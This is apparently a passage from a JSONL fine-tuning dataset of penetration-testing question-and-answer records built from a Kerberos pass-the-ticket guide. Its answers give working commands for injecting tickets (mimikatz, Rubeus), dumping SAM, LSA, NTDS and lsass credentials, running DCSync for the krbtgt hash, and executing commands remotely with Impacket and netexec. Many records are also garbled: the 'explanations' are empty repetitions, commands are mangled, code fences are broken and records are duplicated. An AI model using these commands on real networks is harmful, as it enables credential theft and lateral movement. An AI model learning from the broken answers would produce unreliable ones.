tools can then use the ticket just like usual.\n* On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the environment variable KRB5CCNAME\n\n::: tabs\n\n=== UNIX-like\n\nOnce a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.\n\n``bash\nexport KRB5CCNAME=$path_to_ticket.ccache\n`\n\n=== Windows\n\nThe most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.\n\nThis can also be done manually with mimikatz using kerberos::ptt or Rubeus.\n\n``powershell", "metadata": {"corpus_index": 680, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the ticket - Injecting the ticket"}, {"role": "assistant", "content": "* On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft tools can then use the ticket just like usual.\n* On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the environment variable KRB5CCNAME\n\n::: tabs\n\n=== UNIX-like\n\nOnce a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.\n\n``bash\nexport KRB5CCNAME=$path_to_ticket.ccache\n`\n\n=== Windows\n\nThe most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.\n\nThis can also be done manually with mimikatz using kerberos::ptt or Rubeus.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the ticket - Injecting the ticket", "response": "* On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft tools can then use the ticket just like usual.\n* On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the environment variable KRB5CCNAME\n\n::: tabs\n\n=== UNIX-like\n\nOnce a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.\n\n``bash\nexport KRB5CCNAME=$path_to_ticket.ccache\n`\n\n=== Windows\n\nThe most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.\n\nThis can also be done manually with mimikatz using kerberos::ptt or Rubeus.\n\n``powershell", "metadata": {"corpus_index": 680, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use export for pass the ticket - injecting the ticket?"}, {"role": "assistant", "content": "export KRB5CCNAME=$path_to_ticket.ccache"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use export for pass the ticket - injecting the ticket?", "response": "export KRB5CCNAME=$path_to_ticket.ccache", "metadata": {"corpus_index": 681, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "export"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pass the ticket - Injecting the ticket"}, {"role": "assistant", "content": "export KRB5CCNAME=$path_to_ticket.ccache"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pass the ticket - Injecting the ticket", "response": "export KRB5CCNAME=$path_to_ticket.ccache", "metadata": {"corpus_index": 681, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `export KRB5CCNAME=$path_to_ticket.ccache`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - injecting the ticket. Injecting the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `export KRB5CCNAME=$path_to_ticket.ccache`?", "response": "This command is used for pass the ticket - injecting the ticket. Injecting the ticket", "metadata": {"corpus_index": 681, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is use a .ccache file?"}, {"role": "assistant", "content": "kerberos::ptt $ticket_ccache_file\n``\n\n`powershell\nRubeus.exe ptt /ticket:\"base64 | file.kirbi\"\n`\n\nIt is then possible to list the tickets in memory using the klist` command.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is use a .ccache file?", "response": "kerberos::ptt $ticket_ccache_file\n``\n\n`powershell\nRubeus.exe ptt /ticket:\"base64 | file.kirbi\"\n`\n\nIt is then possible to list the tickets in memory using the klist` command.\n\n:::", "metadata": {"corpus_index": 682, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for use a .ccache file"}, {"role": "assistant", "content": "kerberos::ptt $ticket_ccache_file\n``\n\n`powershell\nRubeus.exe ptt /ticket:\"base64 | file.kirbi\"\n`\n\nIt is then possible to list the tickets in memory using the klist` command.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for use a .ccache file", "response": "kerberos::ptt $ticket_ccache_file\n``\n\n`powershell\nRubeus.exe ptt /ticket:\"base64 | file.kirbi\"\n`\n\nIt is then possible to list the tickets in memory using the klist` command.\n\n:::", "metadata": {"corpus_index": 682, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for use a .ccache file?"}, {"role": "assistant", "content": "```powershell\nRubeus.exe ptt /ticket:\"base64 | file.kirbi\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for use a .ccache file?", "response": "```powershell\nRubeus.exe ptt /ticket:\"base64 | file.kirbi\"", "metadata": {"corpus_index": 683, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ````powershell`?"}, {"role": "assistant", "content": "This command is used for use a .ccache file. use a .ccache file"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ````powershell`?", "response": "This command is used for use a .ccache file. use a .ccache file", "metadata": {"corpus_index": 683, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Pass the ticket - Passing the ticket?"}, {"role": "assistant", "content": "* On Windows, once Kerberos tickets are injected, they can be used natively.\n* On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.\n\n``bash\nsecretsdump.py -k $TARGET\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS\n`\n\nOn Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n`\n\n=== Command execution\n\nSome Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.\n\n`bash\npsexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n\n`bash\nnetexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami\n`\n\nOn Windows, legitimate tools like the sysinternals PsExec (download) can then be used to open a cmd using that ticket.\n\n`powershell\n.\\PsExec.exe -accepteula \\\\$TARGET cmd\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Pass the ticket - Passing the ticket?", "response": "* On Windows, once Kerberos tickets are injected, they can be used natively.\n* On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.\n\n``bash\nsecretsdump.py -k $TARGET\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS\n`\n\nOn Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n`\n\n=== Command execution\n\nSome Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.\n\n`bash\npsexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n\n`bash\nnetexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami\n`\n\nOn Windows, legitimate tools like the sysinternals PsExec (download) can then be used to open a cmd using that ticket.\n\n`powershell\n.\\PsExec.exe -accepteula \\\\$TARGET cmd\n``\n\n:::", "metadata": {"corpus_index": 684, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Pass the ticket - Passing the ticket?"}, {"role": "assistant", "content": "* On Windows, once Kerberos tickets are injected, they can be used natively.\n* On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.\n\n``bash\nsecretsdump.py -k $TARGET\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS\n`\n\nOn Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n`\n\n=== Command execution\n\nSome Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.\n\n`bash\npsexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n\n`bash\nnetexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami\n`\n\nOn Windows, legitimate tools like the sysinternals PsExec (download) can then be used to open a cmd using that ticket.\n\n`powershell\n.\\PsExec.exe -accepteula \\\\$TARGET cmd\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Pass the ticket - Passing the ticket?", "response": "* On Windows, once Kerberos tickets are injected, they can be used natively.\n* On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.\n\n``bash\nsecretsdump.py -k $TARGET\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS\n`\n\nOn Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash with lsadump::dcsync.\n\n`bash\nlsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt\n`\n\n=== Command execution\n\nSome Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.\n\n`bash\npsexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n\n`bash\nnetexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami\n`\n\nOn Windows, legitimate tools like the sysinternals PsExec (download) can then be used to open a cmd using that ticket.\n\n`powershell\n.\\PsExec.exe -accepteula \\\\$TARGET cmd\n``\n\n:::", "metadata": {"corpus_index": 684, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the secretsdump.py syntax for pass the ticket - passing the ticket?"}, {"role": "assistant", "content": "secretsdump.py -k $TARGET"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the secretsdump.py syntax for pass the ticket - passing the ticket?", "response": "secretsdump.py -k $TARGET", "metadata": {"corpus_index": 685, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "secretsdump.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the ticket - Passing the ticket"}, {"role": "assistant", "content": "secretsdump.py -k $TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the ticket - Passing the ticket", "response": "secretsdump.py -k $TARGET", "metadata": {"corpus_index": 685, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `secretsdump.py -k $TARGET`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - passing the ticket. Passing the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `secretsdump.py -k $TARGET`?", "response": "This command is used for pass the ticket - passing the ticket. Passing the ticket", "metadata": {"corpus_index": 685, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the netexec command to pass the ticket - passing the ticket"}, {"role": "assistant", "content": "netexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the netexec command to pass the ticket - passing the ticket", "response": "netexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds", "metadata": {"corpus_index": 686, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Pass the ticket - Passing the ticket"}, {"role": "assistant", "content": "netexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Pass the ticket - Passing the ticket", "response": "netexec smb $TARGETS -k --sam\nnetexec smb $TARGETS -k --lsa\nnetexecETS -k --ntds", "metadata": {"corpus_index": 686, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb $TARGETS -k --sam`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - passing the ticket. Passing the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb $TARGETS -k --sam`?", "response": "This command is used for pass the ticket - passing the ticket. Passing the ticket", "metadata": {"corpus_index": 686, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the netexec command to pass the ticket - passing the ticket"}, {"role": "assistant", "content": "netexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the netexec command to pass the ticket - passing the ticket", "response": "netexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS", "metadata": {"corpus_index": 687, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Pass the ticket - Passing the ticket?"}, {"role": "assistant", "content": "netexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Pass the ticket - Passing the ticket?", "response": "netexec smb $TARGETS -k -M lsassy\nnetexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -k $TARGETS", "metadata": {"corpus_index": 687, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb $TARGETS -k -M lsassy`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - passing the ticket. Passing the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb $TARGETS -k -M lsassy`?", "response": "This command is used for pass the ticket - passing the ticket. Passing the ticket", "metadata": {"corpus_index": 687, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the psexec.py syntax for pass the ticket - passing the ticket?"}, {"role": "assistant", "content": "psexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the psexec.py syntax for pass the ticket - passing the ticket?", "response": "psexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'", "metadata": {"corpus_index": 688, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "psexec.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Pass the ticket - Passing the ticket"}, {"role": "assistant", "content": "psexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Pass the ticket - Passing the ticket", "response": "psexec.py -k 'DOMAIN/USER@TARGET'\nsmbexec.py -k 'DOMAIN/USER@TARGET'\nwmiexec.py -k 'DOMAIN/USER@TARGET'\natexec.py -k 'DOMAIN/USER@TARGET'\ndcomexec.py -k 'DOMAIN/USER@TARGET'", "metadata": {"corpus_index": 688, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `psexec.py -k 'DOMAIN/USER@TARGET'`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - passing the ticket. Passing the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `psexec.py -k 'DOMAIN/USER@TARGET'`?", "response": "This command is used for pass the ticket - passing the ticket. Passing the ticket", "metadata": {"corpus_index": 688, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the netexec syntax for pass the ticket - passing the ticket?"}, {"role": "assistant", "content": "netexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the netexec syntax for pass the ticket - passing the ticket?", "response": "netexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami", "metadata": {"corpus_index": 689, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", 